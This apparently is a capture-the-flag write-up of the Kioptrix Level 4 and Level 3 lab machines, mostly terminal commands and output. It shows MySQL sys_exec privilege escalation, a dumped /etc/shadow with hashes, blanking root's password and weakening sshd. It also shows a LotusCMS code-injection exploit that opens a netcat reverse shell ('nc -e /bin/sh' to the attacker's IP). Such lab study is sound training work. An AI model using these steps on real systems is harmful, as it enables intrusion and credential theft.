$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

mysql -u root -h localhost

Let's play with system permissions:

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> SELECT sys_exec('chown john.john /etc/shadow');                                                                                                                                                            
+-----------------------------------------+
| sys_exec('chown john.john /etc/shadow') |
+-----------------------------------------+
| NULL                                    | 
+-----------------------------------------+
1 row in set (0.00 sec)

mysql>  SELECT sys_exec('chown john.john /etc/passwd');  
+-----------------------------------------+
| sys_exec('chown john.john /etc/passwd') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT sys_exec('chown -R john.john /root'); 
+--------------------------------------+
| sys_exec('chown -R john.john /root') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit

john@Kioptrix4:/home/loneferret$ cd /root
john@Kioptrix4:/root$ ls
congrats.txt  lshell-0.9.12
john@Kioptrix4:/root$ ls -la
total 44
drwxr-xr-x  4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-------  1 john john   59 2012-02-06 20:24 .bash_history
-rw-r--r--  1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 john john  625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 john john    1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 john john    1 2012-02-05 10:38 .mysql_history
-rw-------  1 john john    5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 john john  141 2007-10-20 07:51 .profile
drwx------  2 john john 4096 2012-02-06 11:43 .ssh

john@Kioptrix4:/root$ cat congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

Let us continue the game:

cat /etc/shadow
root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::


Let us change /etc/passwd to this:
root::0:0:root:/root:/bin/bash

And /etc/shadow to this:
root::::

Let us change now ssh config:

mysql> SELECT sys_exec('chown -R john.john /etc/ssh');
+-----------------------------------------+
| sys_exec('chown -R john.john /etc/ssh') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.01 sec)

vim sshd_config

# Package generated configuration file
# See the sshd(8) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
#UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile      %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog no
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

UsePAM no
"sshd_config" 77L, 1872C written


Let's reload the system:
mysql> SELECT sys_exec('reboot');                

Broadcast message from root@Kioptrix4
(unknown) at 15:40 ...

The system is going down for reboot NOW!
+--------------------+
| sys_exec('reboot') |
+--------------------+
| NULL               |
+--------------------+
1 row in set (0.02 sec)


Game over:
ssh root@192.168.180.136
root@Kioptrix4:~# ls -la
total 44
drwxr-xr-x  4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-------  1 john john   62 2016-07-05 15:51 .bash_history
-rw-r--r--  1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 john john  625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 john john    1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 john john    1 2012-02-05 10:38 .mysql_history
-rw-------  1 john john    5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 john john  141 2007-10-20 07:51 .profile
drwx------  2 john john 4096 2016-07-05 15:23 .ssh

Regards,
Yuriy Stanchev/URIX

Kioptrix Level 3

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of the VM Kioptrix L3 from Vulnhub - a site dedicated to penetration testing Capture The Flag challenges. 




Scenario let's try this:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.139
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.139
dirb http://192.168.180.139
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
nikto -h 192.168.180.139

In case there is SMB:
smbclient -N -L 192.168.180.139
enum4linux -a 192.168.180.139


 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.                
 192.168.180.139 00:0c:29:e3:3f:e5      1      60  VMware, Inc.                
 192.168.180.254 00:50:56:ee:9d:40      1      60  VMware, Inc.    

nmap -sV -T4 -O -F --version-light 192.168.180.139
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:38 EDT
Nmap scan report for 192.168.180.139
Host is up (0.00019s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:39 EDT
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x
|   2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=8/15%OT=22%CT=1%CU=34293%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=57B155A9%P=i586-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=
OS:7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=M5
OS:B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A
OS:0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW
OS:5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.001 days (since Mon Aug 15 01:38:55 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.18 ms 192.168.180.139

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.346KB)

nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139

Nothing interesting from this scan.

dirb http://192.168.180.139

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Aug 15 01:49:58 2016
URL_BASE: http://192.168.180.139/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.180.139/ ----
==> DIRECTORY: http://192.168.180.139/cache/                                   
==> DIRECTORY: http://192.168.180.139/core/                                    
+ http://192.168.180.139/data (CODE:403|SIZE:326)                              
+ http://192.168.180.139/favicon.ico (CODE:200|SIZE:23126)                     
==> DIRECTORY: http://192.168.180.139/gallery/                                 
+ http://192.168.180.139/index.php (CODE:200|SIZE:1819)                        
==> DIRECTORY: http://192.168.180.139/modules/                                 
==> DIRECTORY: http://192.168.180.139/phpmyadmin/                              
+ http://192.168.180.139/server-status (CODE:403|SIZE:335)                     
==> DIRECTORY: http://192.168.180.139/style/                                   
                                                                               
---- Entering directory: http://192.168.180.139/cache/ ----
+ http://192.168.180.139/cache/index.html (CODE:200|SIZE:1819)                 
                                                                               
---- Entering directory: http://192.168.180.139/core/ ----
==> DIRECTORY: http://192.168.180.139/core/controller/                         
+ http://192.168.180.139/core/index.php (CODE:200|SIZE:0)                      
==> DIRECTORY: http://192.168.180.139/core/lib/                                
==> DIRECTORY: http://192.168.180.139/core/model/                              
==> DIRECTORY: http://192.168.180.139/core/view/                               
                                                                               
---- Entering directory: http://192.168.180.139/gallery/ ----
+ http://192.168.180.139/gallery/index.php (CODE:500|SIZE:5650)                
==> DIRECTORY: http://192.168.180.139/gallery/photos/                          
==> DIRECTORY: http://192.168.180.139/gallery/themes/                          
                                                                               
---- Entering directory: http://192.168.180.139/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/ ----
+ http://192.168.180.139/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)          
+ http://192.168.180.139/phpmyadmin/index.php (CODE:200|SIZE:8136)             
==> DIRECTORY: http://192.168.180.139/phpmyadmin/js/                           
==> DIRECTORY: http://192.168.180.139/phpmyadmin/lang/                         
+ http://192.168.180.139/phpmyadmin/libraries (CODE:403|SIZE:342)              
+ http://192.168.180.139/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)              
==> DIRECTORY: http://192.168.180.139/phpmyadmin/scripts/                      
==> DIRECTORY: http://192.168.180.139/phpmyadmin/themes/                       
                                                                               
---- Entering directory: http://192.168.180.139/style/ ----
+ http://192.168.180.139/style/admin.php (CODE:200|SIZE:356)                   
+ http://192.168.180.139/style/index.php (CODE:200|SIZE:0)                     
                                                                               
---- Entering directory: http://192.168.180.139/core/controller/ ----
+ http://192.168.180.139/core/controller/index.php (CODE:200|SIZE:0)           
                                                                               
---- Entering directory: http://192.168.180.139/core/lib/ ----
+ http://192.168.180.139/core/lib/index.php (CODE:200|SIZE:0)                  
                                                                               
---- Entering directory: http://192.168.180.139/core/model/ ----
+ http://192.168.180.139/core/model/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.180.139/core/view/ ----
+ http://192.168.180.139/core/view/index.php (CODE:200|SIZE:0)                 
                                                                               
---- Entering directory: http://192.168.180.139/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Aug 15 01:50:07 2016
DOWNLOADED: 46120 - FOUND: 17


wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.139/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request    
==================================================================

00489:  C=301      9 L      31 W    357 Ch  "cache"
..."
00692:  C=301      9 L      31 W    356 Ch  "core"
..."
00779:  C=403     10 L      33 W    326 Ch  "data"
..."
02082:  C=301      9 L      31 W    362 Ch  "phpmyadmin"
..."
03035:  C=404      9 L      35 W    324 Ch  "yomama"..."


^C
Finishing pending requests...


nikto -h 192.168.180.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.139
+ Target Hostname:    192.168.180.139
+ Target Port:        80
+ Start Time:         2016-08-15 02:01:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2016-08-15 02:01:22 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


http://192.168.180.139/phpmyadmin/Documentation.html
phpMyAdmin 2.11.3 Documentation

http://192.168.180.139/phpmyadmin
Welcome to phpMyAdmin 2.11.3deb1ubuntu1.3

http://192.168.180.139/phpmyadmin/changelog.php
2.11.3.0 (2007-12-08)

http://192.168.180.139/index.php?system=Admin

Proudly Powered by: LotusCMS

http://192.168.180.139/gallery/index.php

At this point I added kioptrix3.com to the host file.

Did not work:
https://www.exploit-db.com/exploits/15964/

Let's try this one:
https://github.com/Hood3dRob1n/LotusCMS-Exploit

./lotusRCE.sh kioptrix3.com /

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.180.132
What PORT?
443

OK, open your local listener and choose the method for back connect:
1) NetCat -e    3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.139] 47705

ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.3   2844  1692 ?        Ss   04:33   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   04:33   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   04:33   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   04:33   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   04:33   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   04:33   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   04:33   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   04:33   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpi_notify]
root       104  0.0  0.0      0     0 ?        S<   04:33   0:00 [kseriod]
root       143  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       144  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       145  0.0  0.0      0     0 ?        S<   04:33   0:00 [kswapd0]
root       187  0.0  0.0      0     0 ?        S<   04:33   0:00 [aio/0]
root      1272  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata/0]
root      1275  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata_aux]
root      1284  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_0]
root      1287  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_1]
root      2208  0.0  0.0      0     0 ?        S<   04:33   0:00 [kjournald]
root      2364  0.0  0.1   2224   664 ?        S<s  04:34   0:00 /sbin/udevd --daemon
root      2732  0.0  0.0      0     0 ?        S<   04:34   0:00 [kpsmoused]
root      3864  0.0  0.1   1716   516 tty4     Ss+  04:34   0:00 /sbin/getty 38400 tty4
root      3865  0.0  0.0   1716   512 tty5     Ss+  04:34   0:00 /sbin/getty 38400 tty5
root      3869  0.0  0.1   1716   516 tty2     Ss+  04:34   0:00 /sbin/getty 38400 tty2
root      3870  0.0  0.1   1716   516 tty3     Ss+  04:34   0:00 /sbin/getty 38400 tty3
root      3872  0.0  0.1   1716   516 tty6     Ss+  04:34   0:00 /sbin/getty 38400 tty6
syslog    3913  0.0  0.1   1936   644 ?        Ss   04:34   0:00 /sbin/syslogd -u syslog
root      3932  0.0  0.1   1872   548 ?        S    04:34   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      3934  0.0  0.3   3028  1856 ?        Ss   04:34   0:00 /sbin/klogd -P /var/run/klogd/kmsg
root      3959  0.0  0.1   5316  1020 ?        Ss   04:34   0:00 /usr/sbin/sshd
root      4015  0.0  0.1   1772   524 ?        S    04:34   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4057  0.0  3.2 127228 16668 ?        Sl   04:34   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4059  0.0  0.1   1700   552 ?        S    04:34   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
daemon    4123  0.0  0.0   1984   420 ?        Ss   04:34   0:00 /usr/sbin/atd
root      4142  0.0  0.1   2104   892 ?        Ss   04:34   0:00 /usr/sbin/cron
root      4165  0.0  1.2  20780  6392 ?        Ss   04:34   0:00 /usr/sbin/apache2 -k start
www-data  4184  0.0  1.2  21272  6604 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4185  0.0  1.5  22032  7852 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4186  0.0  1.4  21732  7332 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4187  0.0  1.6  22280  8364 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4188  0.0  1.3  21308  6996 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
dhcp      4201  0.0  0.1   2440   764 ?        Ss   04:34   0:00 dhclient
root      4208  0.0  0.0   1716   508 tty1     Ss+  04:34   0:00 /sbin/getty 38400 tty1
www-data  4209  0.0  1.2  21304  6692 ?        S    04:37   0:00 /usr/sbin/apache2 -k start
www-data  4240  0.0  1.2  21272  6624 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4241  0.0  1.3  21404  6736 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4242  0.0  1.6  22560  8304 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4254  0.0  1.2  21280  6612 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4326  0.0  0.0   1772   488 ?        S    05:45   0:00 sh -c nc -e /bin/sh 192.168.180.132 443
www-data  4327  0.0  0.0   1772   488 ?        R    05:45   0:00 sh
www-data  4328  0.0  0.1   2364   920 ?        R    05:46   0:00 ps -aux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

ls -la /home/loneferret/
total 64
drwxr-xr-x 3 loneferret loneferret  4096 Apr 17  2011 .
drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
-rw-r--r-- 1 loneferret users         13 Apr 18  2011 .bash_history
-rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
-rw------- 1 root       root          15 Apr 15  2011 .nano_history
-rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
